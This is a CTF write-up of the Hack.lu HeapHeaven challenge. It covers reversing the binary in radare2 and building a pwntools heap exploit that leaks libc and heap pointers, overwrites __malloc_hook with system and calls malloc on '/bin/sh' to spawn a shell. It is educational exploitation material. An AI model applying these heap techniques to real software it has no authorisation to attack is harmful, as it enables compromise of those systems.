Intro
In the quest to do heap exploits, learning radare2 and the like, I got myself hooked into a CTF that caught my attention because of it having many exploitation challenges. This was the Hack.lu CTF:Hack.lu challenges by FluxFingers |
The analysis
heaps and pieces
For this challenge we are given (again) the libc.so.6 along the binary. If this is a good giveaway that we will have to do some jump to libc's functions to gain code execution. The binary itself is just an:HeapHeaven: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=617e9a6742b6537d6868f2f8355d64bea4316a99, not stripped
Cool! It's not stripped. This means that we have all the debugging symbols. First thing I did was throwing it into radare2 and check the functions from the menu we are presented with:
HeapHeaven menu |
We can see that the functions should be something like "whaa!", "mommy?", etc.
Firing up the radar
We fire up radare2 against the HeapHeaven file like so:$: radare2 HeapHeaven -AAThis will open the file and do an extensive analysis of it. For a quicker but less extensive analysis, we can just put one "A". Once the analysis is complete, we can head to the var code analysis menu by writing the command
vv
and pressing enter. If you haven't ever used radare2, you are wondering if all the commands are going to be like "aa
" "vv
" "cc
". Well...radare2 trolling |
After typing in
vv
we are presented with the whole lot of functions resolved by radare2 due to the file not being stripped. Yay!Non-stripped symbols on radare2 |
By inspecting the first function from the menu, namely "whaa!", we see a function parsing a number and then a call to malloc. Our intuition is telling us that this function will serve to allocate chunks of whichever size we specify and that, the other functions, will be doing all other heap manipulation. To prove this inside radare2, we browse with the arrow keys to the function we want and then press
g
to seek to that function position. Then press V
(shift + "V") to go to the visual graph representation.whaa! function representation |
get_num
function a bit and say that, it is actually not parsing a number. Let's see it in radare2. Again, seek to the function and press capital V:DIsassembly of get_num |
%255s
and it will get stored on the argument pointed by the RAX register. In radare2, it's shown as local_110h
which is then passed to parse_num
.Zoom out of parse_num function. |
Here, thanks to the blue arrows that radare2 describes, we can observe that most likely there is some kind of loop logic happening. Since it is parsing a "number" and previously a string was
scanf
'ed, it would not be a bad assumption to think that it's parsing our string.Prologue of parse_num function. |
RDI
and then it's stored in a local variable local_18h
. This is afterwards compared against certain bytes and the counter (local_ch
) of the loop is incremented by 2. The operation done inside the loop is actually, "binary adding" through bitshifting with the shl
opcode. Finally, the resulting operation is stored in another variable to be returned into RAX
(local_8h
).Function parse_num comparing bytes. |
rax + 1
), and then accessing the byte to that offset of the array (mov rax, qword [local_18h]; add rax, rdx; movzx eax, byte [rax]
) to compare it against he byte 0x69 (letter "i").
Something that would help us at this point is, renaming the variables to something more user friendly. In radare2, we can do this by seeking to the offset of the function we want to with:[0x00000b8d]> s sym.parse_num [0x000009ca]> afvn local_ch counter_int [0x000009ca]> afvn local_18h arg_string [0x000009ca]> afvn local_8h result
Second part of parse_num function with renamed variables. |
This is now quite clearer, isn't it? Basically, it is being compared against the bytes
0x77
, 0x69
and 0x61
. If it's 0x77
(letter "w"), it will jump to the next char and check if it's 0x69
or 0x61
(letter "a"). If the next char is "i", it will add one to the result. Else, if the char is "a", it will just increase the counter and keep parsing.
See the translation? We are feeding binary numbers as toddlers (regarding FluxFingers) speak, "wi" being 1
and "wa" being 0
.
The exploit
Having the following functions:whaa!
: Allocates chunks of a specified size.mommy?
: Reads a string from a specified offset.<spill>
: Writes to an specified offset.NOM-NOM
: Free's a pointer at an specified offset.Here's what we need to do.
- Leak
top
and heap pointers - Calculate the offset to
__malloc_hook
- Calculate the offset to
system
- Write the address of
system
into__malloc_hook
- Call system with "/bin/sh" as an argument
babbling comprehensively
To code the solution I relied heavily on pwntools by Zach Riggle. The library is just great. I started writing a function that will translate an hex number to a comprehensive babbling ("wiwawiwa" like).... def translate_baby(size): wiwa = "" for bit in ("%s" % "{0:b}".format(size)): if bit == "1": wiwa += "wi" else: wiwa += "wa" return ("%s" % (wiwa+"0"*(254-len(wiwa)))) ...
I am padding the string with zeroes to the right. This is because the
scanf
tries to read %255s
and, the loop, won't stop until the counter reaches 0x3f
. This would cause trouble because if we don't pad enough chars to the right, the parse_num function will keep reading values from memory and, in case there is another "wiwa" around there, it will mess up our calculations #truestory.
leaking addresses
From the Painless intro to ptmalloc2, we remember that a normal chunk had the following structure:+---------------------------------+-+-+-+ | CHUNK SIZE |A|M|P| +---------------------------------+-+-+-+ | FORWARD POINTER(FD) | | BACK POINTER(BK) | | | | | | - - - - - - - - - - - - - | | PREV_SIZE OR USER DATA | +---------------------------------------+
The FD pointer is set to, either the top chunk pointer if it's the only chunk free of that size or, to the next free chunk of the same size if there are more chunks free'd afterwards. Since we can read from a certain offset, we are able to trigger allocations and free's to set top and FD pointers to then, read those:
... # Alocate four chunks so we can avoid coalescing chunks and leak: # * Pointer to chunk2 # * Pointer to main_arena+88 (av->top) allocate_chunk(0x128, io) allocate_chunk(0x128, io) allocate_chunk(0x128, io) allocate_chunk(0x128, io) # Now free chunks 2 and 4 in that order so we can access their FD # The first free'd chunk's FD will point to main_arena->top # The second free'd chunk's FD will point to the second chunk free_chunk(0x20, io) free_chunk(0x280, io) # Read the FD pointers and store them to calculate offsets to libc main_arena_leak = read_from(0x20, io) print("[+] Main_arena: %#x" % main_arena_leak) heap_2nd_chunk = read_from(0x280, io) print("[+] 2nd chunk: %#x" % heap_2nd_chunk) ...
I am not going to cover why or where those pointers are set since I think I have covered this matter extensively on previous heap posts (don't be lazy, read them!). However, it's mandatory to explain why we need to free the offset to 0x20 and the offset to 0x280. When the program starts, it triggers a malloc(0x0) which, in turn, reserves 32 bytes (0x20 in hex) in memory. As you may remember, fastchunks only set their FD pointer (fastbins are single linked lists), hence jumping over the first fastchunk and going straight to free the next chunk of size 0x130 in memory (we allocated 0x130-0x8 in order to trigger an effective allocation of 0x130 in memory). This will set its FD and BK pointers to the top chunk in main_arena.
Function parse_num comparing bytes. |
Now we free the fourth chunk in order to populate it's FD pointer and make it point to the first free'd chunk. See how the FD pointer is pointing to the previous free'd chunk 0x55cd4bd8020.
Status of the fourth chunk after the second free |
... # Read the FD pointers and store them to calculate offsets to libc main_arena_leak = read_from(0x20, io) print("[+] Main_arena: %#x" % main_arena_leak) heap_2nd_chunk = read_from(0x280, io) print("[+] 2nd chunk: %#x" % heap_2nd_chunk) ...
Return to libc (ret2libc)
After leaking both addresses, one to the heap and another one insidemain_arena
we have effectively bypassed ASLR. The main_arena
is always placed at a fixed relative position from the other functions of the libc library. After all, the heap is implemented inside libc.
To obtain the offsets to other functions we can just query inside gdb and then move the offsets depending on the libc we are targeting.Calculating offsets within gdb |
... # Offset calculation happa_at = heap_2nd_chunk - 0x10 malloc_hook_at = main_arena_leak - 0x68 malloc_hook_offset = malloc_hook_at - happa_at libc_system = malloc_hook_at - 0x37f780 ...
The variable happa_at is the address of the base of the heap. This is, the first allocated chunk of them all.
malloc_hook_at
represents the absolute address of the weak pointer __malloc_hook
. We are using this hook to calculate offsets instead of the top
chunk (there is no special reason for this). Finally, the system
symbol is calculated and stored into the libc_system
variable.
We need happa_at because when using the "<spill>" function, we have to provide as the first argument an offset (not an address!). This offset starts from the base of the heap (namely, happa_at
). Then, we provide the string we want to write at that offset.
Our goal is to write at __malloc_hook
the address of system
. There are several techniques like creating fake FILE
structures, overwriting malloc
hooking functions or going after the dtors
. All of this in order to redirect code execution. I chose this one since it's the one I feel is simpler enough and it is so convenient as the function we place in __malloc_hook
must take the form of malloc
. This means that the function we place in there must take an argument just as malloc, so system
fits so well.
wiwapwn
Having in mind that__malloc_hook
only gets triggered when an allocation happens and, that the argument to malloc
is passed onto __malloc_hook
therefore passed onto system. This means that the last malloc
we trigger, needs to have a pointer to the string "/bin/sh\x00". We can satisfy this by writing the string to any of the chunks already allocated and then, feed the pointer to that chunk's position. I've chosen the first allocated chunk at offset 0x0
, this is, the pointer pointed by happa_at
:
... # write /bin/sh to the first chunk (pointed by happa_at) write_to(0x0, io, "/bin/sh\x00") ...Since we have calculated the offsets to all that we need let's overwrite the pointer of
__malloc_hook
with the pointer to system:
... # Write the address of system at __malloc_hook write_to(malloc_hook_offset, io, p64(libc_system)) ...
All we need to do now is trigger
__malloc_hook
with the address of "/bin/sh\x00" as an argument and interact with the shell:
... # Call malloc and feed it the argument of /bin/sh which is at happa_at # This will trigger __malloc_hook((char*)"/bin/sh") and give us shell :) allocate_chunk(happa_at, io) ...
Exploit for HeapHeaven |
Final notes
Note that I didn't need to change any offsets to system's libc to exploit the remote system. This was because the system I used to build the exploit had the same libc. In case we don't have the same libc and we are provided with such what we need to do is, calculate the base of libc through leaked pointers and then, add offsets like such:Exploit for HeapHeaven |
libc_system = calculated_libc_base + 0x45390
As a final note. This blog was actually published in my actual company's internal blog that I decided to also make it public through my blog since I don't think write-ups are SensePost's-blog-worthy.
I hope you enjoyed this write-up as much as I enjoyed solving this challenge! You can get the full HeapHeaven exploit code here.